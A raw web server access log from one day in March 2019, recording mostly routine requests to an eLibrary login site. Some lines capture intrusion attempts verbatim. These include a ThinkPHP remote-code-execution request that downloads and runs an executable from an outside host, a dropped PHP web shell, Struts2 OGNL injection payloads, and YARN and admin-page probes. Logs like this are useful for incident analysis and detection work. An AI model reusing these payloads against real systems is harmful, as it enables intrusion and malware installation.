209.17.96.34 - - [15/Mar/2019:00:43:13 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:01:08:40 -0400] "POST /wp-content/themes/AdvanceImage5/functions.php HTTP/1.1" 200 2137
127.0.0.1 - - [15/Mar/2019:02:07:06 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:02:07:08 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:02:07:09 -0400] "GET /css/new-style.css HTTP/1.1" 200 5551
127.0.0.1 - - [15/Mar/2019:02:07:09 -0400] "GET /images/CSG%20elibrary%20Logo.png HTTP/1.1" 200 12921
127.0.0.1 - - [15/Mar/2019:02:08:34 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:02:08:34 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:02:08:34 -0400] "GET /css/new-style.css HTTP/1.1" 200 5551
127.0.0.1 - - [15/Mar/2019:02:08:34 -0400] "GET /images/CSG%20elibrary%20Logo.png HTTP/1.1" 200 12921
127.0.0.1 - - [15/Mar/2019:02:08:35 -0400] "GET /images/elibrary2.png HTTP/1.1" 200 137532
127.0.0.1 - - [15/Mar/2019:02:08:35 -0400] "GET /fonts/opensans-regular-webfont.woff2 HTTP/1.1" 404 990
127.0.0.1 - - [15/Mar/2019:02:08:35 -0400] "GET /images/bg.png HTTP/1.1" 200 166566
127.0.0.1 - - [15/Mar/2019:02:08:35 -0400] "GET /fonts/opensans-regular-webfont.woff HTTP/1.1" 404 990
127.0.0.1 - - [15/Mar/2019:02:08:36 -0400] "GET /images/eLibrary%20Pro%20Logo%20-%20Powered%20by%203.png HTTP/1.1" 200 213908
127.0.0.1 - - [15/Mar/2019:02:08:36 -0400] "GET /fonts/opensans-regular-webfont.ttf HTTP/1.1" 404 990
127.0.0.1 - - [15/Mar/2019:02:08:40 -0400] "GET /images/favicon.ico HTTP/1.1" 200 1150
127.0.0.1 - - [15/Mar/2019:02:11:14 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:02:11:14 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:02:11:14 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:02:11:14 -0400] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:02:11:15 -0400] "GET /libraries/sfn.php HTTP/1.1" 200 2137
124.114.235.37 - - [15/Mar/2019:02:16:11 -0400] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/wyrbkdibfwmrfbk8893.exe');start%20C:/Windows/temp/wyrbkdibfwmrfbk8893.exe HTTP/1.1" 200 2137
124.114.235.37 - - [15/Mar/2019:02:16:11 -0400] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 200 2137
124.114.235.37 - - [15/Mar/2019:02:16:12 -0400] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/wyrbkdibfwmrfbk8893.exe');start%20C:/Windows/temp/wyrbkdibfwmrfbk8893.exe HTTP/1.1" 200 2137
127.0.0.1 - - [15/Mar/2019:02:20:58 -0400] "GET /user/register/ HTTP/1.1" 200 2137
209.17.96.34 - - [15/Mar/2019:03:41:12 -0400] "GET / HTTP/1.1" 302 -
209.17.97.26 - - [15/Mar/2019:04:35:19 -0400] "GET / HTTP/1.1" 302 -
209.17.97.82 - - [15/Mar/2019:05:28:47 -0400] "GET / HTTP/1.1" 302 -
209.17.97.90 - - [15/Mar/2019:05:32:22 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:07:03:37 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:07:03:38 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.26 - - [15/Mar/2019:07:24:43 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:07:25:03 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:07:25:03 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:08:07:26 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:08:07:27 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:08:10:34 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:08:10:34 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.250 - - [15/Mar/2019:08:17:38 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:08:33:59 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:08:34:01 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:08:43:43 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:08:43:44 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.50 - - [15/Mar/2019:08:49:57 -0400] "GET / HTTP/1.1" 302 -
139.162.87.250 - - [15/Mar/2019:08:57:48 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:09:02:45 -0400] "GET / HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:00 -0400] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 2137
23.102.51.95 - - [15/Mar/2019:09:06:00 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:00 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:00 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:01 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:01 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:01 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:01 -0400] "POST /index.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:01 -0400] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/login.action HTTP/1.1" 200 2137
23.102.51.95 - - [15/Mar/2019:09:06:01 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:01 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:02 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:02 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:02 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:02 -0400] "POST /login.action HTTP/1.1" 302 -
23.102.51.95 - - [15/Mar/2019:09:06:02 -0400] "POST /login.action HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:09:46:17 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:09:46:29 -0400] "GET /login HTTP/1.1" 200 4162
209.17.97.42 - - [15/Mar/2019:09:59:59 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:10:27:29 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:10:27:30 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:10:34:23 -0400] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:10:34:23 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:10:34:24 -0400] "GET /forgotPasswordLink HTTP/1.1" 200 3711
209.17.97.26 - - [15/Mar/2019:11:02:52 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:11:09:17 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:11:09:18 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:11:17:21 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:11:17:21 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:11:32:14 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:11:32:15 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:11:52:44 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:11:52:44 -0400] "GET /login HTTP/1.1" 200 4162
128.199.42.244 - - [15/Mar/2019:11:58:39 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137
127.0.0.1 - - [15/Mar/2019:12:10:33 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:12:10:34 -0400] "GET /login HTTP/1.1" 200 4162
209.17.97.42 - - [15/Mar/2019:12:36:52 -0400] "GET / HTTP/1.1" 302 -
209.17.96.18 - - [15/Mar/2019:13:09:49 -0400] "GET / HTTP/1.1" 302 -
209.17.97.66 - - [15/Mar/2019:13:23:28 -0400] "GET / HTTP/1.1" 302 -
209.17.97.122 - - [15/Mar/2019:13:54:33 -0400] "GET / HTTP/1.1" 302 -
209.17.96.50 - - [15/Mar/2019:14:14:16 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:14:14:51 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:14:14:54 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.202 - - [15/Mar/2019:14:31:41 -0400] "GET / HTTP/1.1" 302 -
209.17.96.210 - - [15/Mar/2019:14:51:27 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:14:55:15 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:14:55:16 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:15:04:11 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:15:04:12 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:15:43:10 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:15:43:11 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:15:46:39 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:15:46:47 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:16:59:16 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:16:59:17 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.42 - - [15/Mar/2019:17:11:00 -0400] "GET / HTTP/1.1" 302 -
209.17.96.42 - - [15/Mar/2019:17:11:00 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:17:14:14 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:17:14:22 -0400] "GET /login HTTP/1.1" 200 4162
209.17.96.242 - - [15/Mar/2019:17:40:38 -0400] "GET / HTTP/1.1" 302 -
209.17.96.210 - - [15/Mar/2019:17:53:36 -0400] "GET / HTTP/1.1" 302 -
209.17.97.2 - - [15/Mar/2019:18:39:30 -0400] "GET / HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:30 -0400] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 2137
103.79.155.162 - - [15/Mar/2019:18:50:31 -0400] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/login.action HTTP/1.1" 200 2137
103.79.155.162 - - [15/Mar/2019:18:50:31 -0400] "POST /index.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:31 -0400] "POST /login.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:31 -0400] "POST /index.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:32 -0400] "POST /login.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:32 -0400] "POST /index.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:32 -0400] "POST /login.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:32 -0400] "POST /index.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:33 -0400] "POST /login.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:33 -0400] "POST /index.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:33 -0400] "POST /login.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:33 -0400] "POST /index.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:34 -0400] "POST /login.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:34 -0400] "POST /index.action HTTP/1.1" 302 -
103.79.155.162 - - [15/Mar/2019:18:50:34 -0400] "POST /login.action HTTP/1.1" 302 -
209.17.97.10 - - [15/Mar/2019:19:40:28 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:19:56:43 -0400] "GET /wp-login.php HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:19:56:43 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:19:56:43 -0400] "GET /administrator/index.php HTTP/1.1" 200 2137
127.0.0.1 - - [15/Mar/2019:19:56:43 -0400] "GET /phpmyadmin/index.php HTTP/1.1" 200 2137
127.0.0.1 - - [15/Mar/2019:20:14:27 -0400] "HEAD /login HTTP/1.1" 200 -
127.0.0.1 - - [15/Mar/2019:21:12:13 -0400] "GET / HTTP/1.1" 302 -
209.17.97.82 - - [15/Mar/2019:21:26:52 -0400] "GET / HTTP/1.1" 302 -
209.17.97.2 - - [15/Mar/2019:21:45:37 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:21:50:32 -0400] "GET / HTTP/1.1" 302 -
209.17.97.58 - - [15/Mar/2019:22:02:58 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:22:14:08 -0400] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:22:14:09 -0400] "GET /login HTTP/1.1" 200 4162
127.0.0.1 - - [15/Mar/2019:22:14:12 -0400] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [15/Mar/2019:22:14:16 -0400] "GET /login HTTP/1.1" 200 4162
128.199.42.244 - - [15/Mar/2019:22:42:12 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137